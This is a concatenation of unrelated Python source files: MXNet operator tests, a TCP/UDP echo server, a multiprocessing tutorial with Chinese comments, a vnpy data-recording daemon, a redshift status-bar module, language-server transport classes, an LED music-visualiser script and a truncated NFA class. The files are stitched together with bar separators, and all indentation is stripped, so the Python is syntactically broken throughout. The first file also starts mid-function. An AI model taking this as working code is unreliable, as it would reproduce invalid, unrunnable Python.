weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input_oneside(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
def test_sldwin_selfatten_operators():
def gen_sliding_window_mask_full(batch_size, num_heads, seq_length, w, symmetric, d):
mask_np = np.zeros((batch_size, num_heads, seq_length, seq_length))
for i in range(seq_length):
end = (i + 1 + w * d) if symmetric else (i + 1)
for j in range(i - w * d, end, d):
if j >= 0 and j < seq_length:
mask_np[:, :, i, j] = 1
return mask_np
def test_sldwin_atten_op_impl(batch_size, seq_length, num_heads,
num_head_units, w, symmetric, d):
# Generate the data
query = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
key = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
value = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
valid_length = np.zeros((batch_size,))
valid_length[:] = seq_length
query = mx.np.array(query, dtype=np.float32)
key = mx.np.array(key, dtype=np.float32)
value = mx.np.array(value, dtype=np.float32)
dilation = mx.np.ones((num_heads,), dtype=np.int32)
dilation[:] = d
valid_length = mx.np.array(valid_length, dtype=np.int32)
query.attach_grad()
key.attach_grad()
value.attach_grad()
with mx.autograd.record():
score = mx.npx.sldwin_atten_score(query, key, dilation,
w=w, symmetric=symmetric)
mask = mx.npx.sldwin_atten_mask_like(score, dilation, valid_length,
w=w, symmetric=symmetric)
score = score * mask
out = mx.npx.sldwin_atten_context(score, value, dilation,
w=w, symmetric=symmetric)
out.backward()
out_np = out.asnumpy()
grad_query = query.grad.asnumpy()
grad_key = key.grad.asnumpy()
grad_value = value.grad.asnumpy()
query.grad[:] = 0
key.grad[:] = 0
value.grad[:] = 0
mask_np = gen_sliding_window_mask_full(batch_size, num_heads, seq_length,
w, symmetric, d)
mask = mx.np.array(mask_np, dtype=np.float32)
with mx.autograd.record():
score = mx.npx.batch_dot(mx.np.swapaxes(query, 1, 2),
mx.np.swapaxes(key, 1, 2),
transpose_b=True)
score = score * mask
out = mx.npx.batch_dot(score,
mx.np.swapaxes(value, 1, 2)).transpose((0, 2, 1, 3))
out.backward()
out_np_gt = out.asnumpy()
grad_query_gt = query.grad.asnumpy()
grad_key_gt = key.grad.asnumpy()
grad_value_gt = value.grad.asnumpy()
assert_allclose(out_np_gt, out_np, 1E-3, 1E-3)
assert_allclose(grad_query_gt, grad_query, 1E-3, 1E-3)
assert_allclose(grad_key_gt, grad_key, 1E-3, 1E-3)
assert_allclose(grad_value_gt, grad_value, 1E-3, 1E-3)
for symmetric in [True, False]:
for d in [1, 2, 3]:
test_sldwin_atten_op_impl(2, 128, 2, 8, 16, symmetric, d)
test_sldwin_atten_op_impl(1, 8, 2, 4, 2, symmetric, d)
def test_zero_sized_dim():
mx.util.set_np_shape(True) # Must be done to prevent zero-sized dimension conversion to 'unknown'
def seq_last():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18938"""
data = mx.nd.array(np.random.rand(1, 0, 0))
res = mx.nd.op.SequenceLast(data)
assert data.shape[1:] == res.shape
def seq_mask():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18939"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceMask(data)
assert data.shape == res.shape
def seq_reverse():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18940"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceReverse(data)
assert data.shape == res.shape
seq_last()
seq_reverse()
seq_mask()
def test_take_grads():
# Test for https://github.com/apache/incubator-mxnet/issues/19817
from mxnet.gluon.nn import HybridBlock, Conv1D, HybridSequential, HybridLambda, Dense
from mxnet import autograd, nd
from mxnet.gluon.loss import L2Loss
def get_grads(model, grads, ctx=mx.cpu()):
pd = model.collect_params()
total_grad_l2 = 0
total_grad_l1 = 0
total_grad_linf = 0
for p in pd:
try:
g = pd[p].grad(ctx) / N
g2 = (g**2).sum().as_in_context(mx.cpu()).asscalar()
g1 = g.abs().sum().as_in_context(mx.cpu()).asscalar()
ginf = g.max().as_in_context(mx.cpu()).asscalar()
total_grad_linf = max(total_grad_linf, ginf)
total_grad_l2 += g2
total_grad_l1 += g1
except Exception:
pass
grads.append(total_grad_l1)
grads.append(total_grad_l2)
grads.append(total_grad_linf)
def run_model(model, loss, X, Y, num_iters=5):
grads = []
for i in range(num_iters):
with autograd.record():
Y_hat = model(X)
ll = loss(Y_hat, Y)
ll = ll.sum()
ll.backward()
get_grads(model, grads)
return grads
def dense_layer():
den = HybridSequential()
den.add(Dense(10, flatten=True, activation='tanh'))
return den
class Model(HybridBlock):
def __init__(self, use_take=False, **kwargs):
super().__init__()
self.use_take = use_take
self.den = dense_layer()
def hybrid_forward(self, F, X, axis=1):
X1 = self.den(X)
if self.use_take:
X2 = F.take(X1, nd.array([0]), axis=axis)
else:
X2 = F.slice_axis(X1, begin=0, end=1, axis=axis)
return X2
N = 30
T = 20
C = 10
X = np.random.normal(size=(N, T, C))
Y = np.random.normal(size=(N, 1))
X, Y = nd.array(X), nd.array(Y)
seed = np.random.randint(1000)
# Using F.take
mx.random.seed(seed)
model = Model(use_take=True)
model.initialize()
loss = L2Loss()
grads1 = run_model(model, loss, X, Y)
# Using F.slice_axis
mx.random.seed(seed)
model2 = Model(use_take=False)
model2.initialize()
grads2 = run_model(model2, loss, X, Y)
for i in range(len(grads1)):
assert_almost_equal(grads1[i], grads2[i])
|
responder.py
|
import logging
import SocketServer
import time
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
logger = logging.getLogger(__name__)
class EchoRequestHandlerTCP(SocketServer.BaseRequestHandler):
def handle(self):
logger.debug('handle')
# Echo the back to the client
data = self.request.recv(1024)
logger.debug('received (tcp) from %s: "%s"',
self.client_address, data)
self.request.send(data)
return
class EchoRequestHandlerUDP(SocketServer.BaseRequestHandler):
def handle(self):
logger.debug('handle')
# Echo the back to the client
data = self.request[0]
socket = self.request[1]
logger.debug('received (udp) from %s: "%s"',
self.client_address, data)
socket.sendto(data, self.client_address)
return
class EchoServerTCP(SocketServer.TCPServer):
def serve_forever(self):
logger.info('waiting for tcp request')
while True:
self.handle_request()
return
class EchoServerUDP(SocketServer.UDPServer):
def serve_forever(self):
logger.info('waiting for udp request')
while True:
self.handle_request()
return
if __name__ == '__main__':
import socket
import threading
def check_socket(sock):
# Send the data
message = 'Hello world'
logger.debug('sending data: "%s"', message)
len_sent = sock.send(message)
# Receive a response
logger.debug('waiting for response')
response = sock.recv(len_sent)
logger.debug('response from server: "%s"', response)
tcp_addr = "0.0.0.0"
tcp_port = 80
udp_addr = "0.0.0.0"
udp_port = 69
tcp_server = EchoServerTCP((tcp_addr, tcp_port), EchoRequestHandlerTCP)
udp_server = EchoServerUDP((udp_addr, udp_port), EchoRequestHandlerUDP)
try:
t1 = threading.Thread(target=tcp_server.serve_forever)
t1.setDaemon(True) # don't hang on exit
t1.start()
t2 = threading.Thread(target=udp_server.serve_forever)
t2.setDaemon(True) # don't hang on exit
t2.start()
logger.info('TCP Server on %s:%s', tcp_addr, tcp_port)
logger.info('UDP Server on %s:%s', udp_addr, udp_port)
logger.debug('checking tcp server')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logger.debug('connecting to server')
s.connect((tcp_addr, tcp_port))
check_socket(s)
s.close()
logger.debug('checking udp server')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
logger.debug('connecting to server')
s.connect((udp_addr, udp_port))
check_socket(s)
s.close()
while True:
time.sleep(10)
finally:
# Clean up
logger.debug('done')
tcp_server.socket.close()
udp_server.socket.close()
logger.debug('closed sockets')
|
13_mutilprogress.py
|
# from random import randint
# from time import time, sleep
#
#
# def download_task(filename):
# print('开始下载%s...' % filename)
# time_to_download = randint(5, 10)
# sleep(time_to_download)
# print('%s下载完成! 耗费了%d秒' % (filename, time_to_download))
#
#
# def main():
# start = time()
# download_task('Python从入门到住院.pdf')
# download_task('Peking Hot.avi')
# end = time()
# print('总共耗费了%.2f秒.' % (end - start))
#
#
# if __name__ == '__main__':
# main()
from multiprocessing import Process
from os import getpid
from random import randint
from time import time, sleep
def download_task(filename):
print('启动下载进程,进程号[%d].' % getpid())
print('开始下载%s...' % filename)
time_to_download = randint(5, 10)
sleep(time_to_download)
print('%s下载完成! 耗费了%d秒' % (filename, time_to_download))
def main():
start = time()
p1 = Process(target=download_task, args=('Python从入门到住院.pdf', ))
#args是一个元组,它代表了传递给函数的参数
p1.start()
p2 = Process(target=download_task, args=('Peking Hot.avi', ))
p2.start()
p1.join()
p2.join()
end = time()
print('总共耗费了%.2f秒.' % (end - start))
if __name__ == '__main__':
main()
|
runDataRecording.py
|
# encoding: UTF-8
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import ctpGateway
from vnpy.trader.app import dataRecorder
#----------------------------------------------------------------------
def processErrorEvent(event):
"""
处理错误事件
错误信息在每次登陆后,会将当日所有已产生的均推送一遍,所以不适合写入日志
"""
error = event.dict_['data']
print u'错误代码:%s,错误信息:%s' %(error.errorID, error.errorMsg)
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print '-'*20
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(ctpGateway)
me.addApp(dataRecorder)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, processErrorEvent)
le.info(u'注册日志事件监听')
me.connect('CTP')
le.info(u'连接CTP接口')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录守护父进程')
DAY_START = time(8, 57) # 日盘启动和停止时间
DAY_END = time(15, 18)
NIGHT_START = time(20, 57) # 夜盘启动和停止时间
NIGHT_END = time(2, 33)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 过滤周末时间段:周六全天,周五夜盘,周日日盘
if ((datetime.today().weekday() == 6) or
(datetime.today().weekday() == 5 and currentTime > NIGHT_END) or
(datetime.today().weekday() == 0 and currentTime < DAY_START)):
recording = False
# 记录时间则需要启动子进程
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
#runChildProcess()
runParentProcess()
|
redshift.py
|
# pylint: disable=C0111,R0903
"""Displays the current color temperature of redshift
Requires the following executable:
* redshift
"""
import threading
import bumblebee.input
import bumblebee.output
import bumblebee.engine
def is_terminated():
for thread in threading.enumerate():
if thread.name == "MainThread" and not thread.is_alive():
return True
return False
def get_redshift_value(widget):
while True:
if is_terminated():
return
widget.get("condition").acquire()
while True:
try:
widget.get("condition").wait(1)
except RuntimeError:
continue
break
widget.get("condition").release()
try:
res = bumblebee.util.execute("redshift -p")
except Exception:
res = ""
widget.set("temp", "n/a")
widget.set("transition", None)
for line in res.split("\n"):
if "temperature" in line.lower():
widget.set("temp", line.split(" ")[2])
if "period" in line.lower():
state = line.split(" ")[1].lower()
if "day" in state:
widget.set("state", "day")
elif "night" in state:
widget.set("state", "night")
else:
widget.set("state", "transition")
widget.set("transition", " ".join(line.split(" ")[2:]))
class Module(bumblebee.engine.Module):
def __init__(self, engine, config):
widget = bumblebee.output.Widget(full_text=self.text)
super(Module, self).__init__(engine, config, widget)
self._text = ""
self._condition = threading.Condition()
widget.set("condition", self._condition)
self._thread = threading.Thread(target=get_redshift_value, args=(widget,))
self._thread.start()
self._condition.acquire()
self._condition.notify()
self._condition.release()
def text(self, widget):
return "{}".format(self._text)
def update(self, widgets):
widget = widgets[0]
self._condition.acquire()
self._condition.notify()
self._condition.release()
temp = widget.get("temp", "n/a")
self._text = temp
transition = widget.get("transition", None)
if transition:
self._text = "{} {}".format(temp, transition)
def state(self, widget):
return widget.get("state", None)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
transports.py
|
from abc import ABCMeta, abstractmethod
import threading
import time
import socket
from queue import Queue
import subprocess
from .logging import exception_log, debug
try:
from typing import Callable, Dict, Any, Optional, IO
assert Callable and Dict and Any and Optional and subprocess and IO
except ImportError:
pass
ContentLengthHeader = b"Content-Length: "
ContentLengthHeader_len = len(ContentLengthHeader)
TCP_CONNECT_TIMEOUT = 5
try:
from typing import Any, Dict, Callable
assert Any and Dict and Callable
except ImportError:
pass
class UnexpectedProcessExitError(Exception):
pass
class Transport(object, metaclass=ABCMeta):
@abstractmethod
def __init__(self) -> None:
pass
@abstractmethod
def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
pass
@abstractmethod
def send(self, message: str) -> None:
pass
@abstractmethod
def close(self) -> None:
pass
STATE_HEADERS = 0
STATE_CONTENT = 1
STATE_EOF = 2
StateStrings = {STATE_HEADERS: 'STATE_HEADERS',
STATE_CONTENT: 'STATE_CONTENT',
STATE_EOF: 'STATE_EOF'}
def state_to_string(state: int) -> str:
return StateStrings.get(state, '<unknown state: {}>'.format(state))
def start_tcp_listener(tcp_port: int) -> socket.socket:
sock = socket.socket()
sock.bind(('', tcp_port))
port = sock.getsockname()[1]
sock.settimeout(TCP_CONNECT_TIMEOUT)
debug('listening on {}:{}'.format('localhost', port))
sock.listen(1)
return sock
def start_tcp_transport(port: int, host: 'Optional[str]' = None) -> 'Transport':
start_time = time.time()
debug('connecting to {}:{}'.format(host or "localhost", port))
while time.time() - start_time < TCP_CONNECT_TIMEOUT:
try:
sock = socket.create_connection((host or "localhost", port))
return TCPTransport(sock)
except ConnectionRefusedError:
pass
# process.kill()
raise Exception("Timeout connecting to socket")
def build_message(content: str) -> str:
content_length = len(content)
result = "Content-Length: {}\r\n\r\n{}".format(content_length, content)
return result
class TCPTransport(Transport):
def __init__(self, socket: 'Any') -> None:
self.socket = socket # type: 'Optional[Any]'
self.send_queue = Queue() # type: Queue[Optional[str]]
def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
self.on_receive = on_receive
self.on_closed = on_closed
self.read_thread = threading.Thread(target=self.read_socket)
self.read_thread.start()
self.write_thread = threading.Thread(target=self.write_socket)
self.write_thread.start()
def close(self) -> None:
self.send_queue.put(None) # kill the write thread as it's blocked on send_queue
self.socket = None
self.on_closed()
def read_socket(self) -> None:
remaining_data = b""
is_incomplete = False
read_state = STATE_HEADERS
content_length = 0
while self.socket:
is_incomplete = False
try:
received_data = self.socket.recv(4096)
except Exception as err:
exception_log("Failure reading from socket", err)
self.close()
break
if not received_data:
debug("no data received, closing")
self.close()
break
data = remaining_data + received_data
remaining_data = b""
while len(data) > 0 and not is_incomplete:
if read_state == STATE_HEADERS:
headers, _sep, rest = data.partition(b"\r\n\r\n")
if len(_sep) < 1:
is_incomplete = True
remaining_data = data
else:
for header in headers.split(b"\r\n"):
if header.startswith(ContentLengthHeader):
header_value = header[ContentLengthHeader_len:]
content_length = int(header_value)
read_state = STATE_CONTENT
data = rest
if read_state == STATE_CONTENT:
# read content bytes
if len(data) >= content_length:
content = data[:content_length]
self.on_receive(content.decode("UTF-8"))
data = data[content_length:]
read_state = STATE_HEADERS
else:
is_incomplete = True
remaining_data = data
def send(self, content: str) -> None:
self.send_queue.put(build_message(content))
def write_socket(self) -> None:
while self.socket:
message = self.send_queue.get()
if message is None:
break
else:
try:
self.socket.sendall(bytes(message, 'UTF-8'))
except Exception as err:
exception_log("Failure writing to socket", err)
self.close()
class StdioTransport(Transport):
def __init__(self, process: 'subprocess.Popen') -> None:
self.process = process # type: Optional[subprocess.Popen]
self.send_queue = Queue() # type: Queue[Optional[str]]
def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
self.on_receive = on_receive
self.on_closed = on_closed
self.write_thread = threading.Thread(target=self.write_stdin)
self.write_thread.start()
self.read_thread = threading.Thread(target=self.read_stdout)
self.read_thread.start()
def close(self) -> None:
self.process = None
self.send_queue.put(None) # kill the write thread as it's blocked on send_queue
self.on_closed()
def _checked_stdout(self) -> 'IO[Any]':
if self.process:
return self.process.stdout
else:
raise UnexpectedProcessExitError()
def read_stdout(self) -> None:
"""
Reads JSON responses from process and dispatch them to response_handler
"""
running = True
pid = self.process.pid if self.process else "???"
state = STATE_HEADERS
content_length = 0
while running and self.process and state != STATE_EOF:
running = self.process.poll() is None
try:
# debug("read_stdout: state = {}".format(state_to_string(state)))
if state == STATE_HEADERS:
header = self._checked_stdout().readline()
# debug('read_stdout reads: {}'.format(header))
if not header:
# Truly, this is the EOF on the stream
state = STATE_EOF
break
header = header.strip()
if not header:
# Not EOF, blank line -> content follows
state = STATE_CONTENT
elif header.startswith(ContentLengthHeader):
content_length = int(header[ContentLengthHeader_len:])
elif state == STATE_CONTENT:
if content_length > 0:
content = self._checked_stdout().read(content_length)
self.on_receive(content.decode("UTF-8"))
# debug("read_stdout: read and received {} byte message".format(content_length))
content_length = 0
state = STATE_HEADERS
except IOError as err:
self.close()
exception_log("Failure reading stdout", err)
state = STATE_EOF
break
except UnexpectedProcessExitError:
self.close()
debug("process became None")
state = STATE_EOF
break
debug("process {} stdout ended {}".format(pid, "(still alive)" if self.process else "(terminated)"))
if self.process:
# We use the stdout thread to block and wait on the exiting process, or zombie processes may be the result.
returncode = self.process.wait()
debug("process {} exited with code {}".format(pid, returncode))
if returncode != 0:
self.close()
self.send_queue.put(None)
def send(self, content: str) -> None:
self.send_queue.put(build_message(content))
def write_stdin(self) -> None:
while self.process:
message = self.send_queue.get()
if message is None:
break
else:
try:
msgbytes = bytes(message, 'UTF-8')
try:
self.process.stdin.write(msgbytes)
except AttributeError:
return
self.process.stdin.flush()
except (BrokenPipeError, OSError) as err:
exception_log("Failure writing to stdout", err)
self.close()
|
psychroom.py
|
#
# This script plays an mp3 file and communicates via serial.Serial
# with devices in the Technites psychedelic room to visualize the
# music on them.
#
# It talks to 4 devices
# WaterFall -- tubes with LEDs and flying stuff fanned to music
# DiscoBall -- 8 60 watt bulbs wrapped in colored paper
# LEDWall -- a 4 channel strip of LED
# this time it was the LED roof instead :p
# LEDCube -- a 10x10x10 LED cube - work on this is still on
#
# the script also has a sloppy pygame visualization of the fft and
# beats data
#
import sys
import time
import scipy
import pygame
from pygame import display
from pygame.draw import *
import pathsetup # this module sets up PYTHONPATH for all this to work
from devices.discoball import DiscoBall
from devices.waterfall import Waterfall
from devices.ledwall import LEDWall
from devices.cube import Cube
from devices.rgbcube import RGBCube
import phosphene
from phosphene import audio, signalutil, util
from phosphene.util import *
from phosphene.signal import *
from phosphene.dsp import *
from phosphene.graphs import *
from phosphene.signalutil import *
from cube import cubeProcess
#from phosphene import cube
from threading import Thread
# Setup devices with their corresponding device files
devs = [
#Waterfall("/dev/ttyACM5"),
#DiscoBall("/dev/ttyACM8"),
LEDWall("/dev/ttyACM0")
]
pygame.init()
surface = display.set_mode((640, 480))
if len(sys.argv) < 2:
print "Usage: %s file.mp3" % sys.argv[0]
sys.exit(1)
else:
fPath = sys.argv[1]
sF, data = audio.read(fPath)
import serial
signal = Signal(data, sF)
signal.A = lift((data[:,0] + data[:,1]) / 2, True)
signal.beats = lift(lambda s: numpymap(lambda (a, b): 1 if a > b * 1.414 else 0, zip(s.avg8, s.longavg8)))
for d in devs:
d.setupSignal(signal)
def devices(s):
#threads = []
for d in devs:
if d.isConnected:
def f():
d.redraw(s)
#t = Thread(target=f)
#threads.append(t)
#t.start()
f()
#for t in threads:
# t.join(timeout=2)
# if t.isAlive():
# d.isUnresponsive()
surface.fill((0, 0, 0))
graphsGraphs(filter(
lambda g: g is not None,
[d.graphOutput(signal) for d in devs]))(surface, (0, 0, 640, 480))
CubeState = lambda: 0
CubeState.count = 0
cube = RGBCube("/dev/ttyACM2",4)
def cubeUpdate(signal):
if signal.beats[0] or signal.beats[1] or signal.beats[2] or signal.beats[3]:
CubeState.count = cubeProcess(cube, signal, CubeState.count)
def graphsProcess(s):
display.update()
processes = [graphsProcess, devices, cubeUpdate]
signal.relthresh = 1.66
soundObj = audio.makeSound(sF, data)
# make a pygame Sound object from the data
def sendingThread():
while True:
bs = cube.toByteStream()
cube.port.write("S")
print "Wrote S"
readValue = cube.port.read()
print readValue
for j in range(0,4):
for i in range(0,3):
cube.port.write(chr(bs[i][2*j]))
print "wrote", bs[i][2*j]
#time.sleep(0.0001)
cube.port.write(chr(bs[i][2*j+1]))
print "wrote", bs[i][2*j+1]
#time.sleep(0.0001)
t = Thread(target=sendingThread)
t.start()
# run setup on the signal
signalutil.setup(signal)
soundObj.play() # start playing it. This is non-blocking
perceive(processes, signal, 36) # perceive your signal.
|
drawable_nfa.py
|
from nfa import NFA
from drawable_state import DrawableState
from drawable_dfa import DrawableDFA
from threading import Thread
from time import sleep
class DrawableNFA(NFA):
def __init__(self, alphabet = ['0','1'], x = 60, y = 355):
self._alphabet = alphabet + ['']
self._states = [DrawableState(True, False, x, y)]
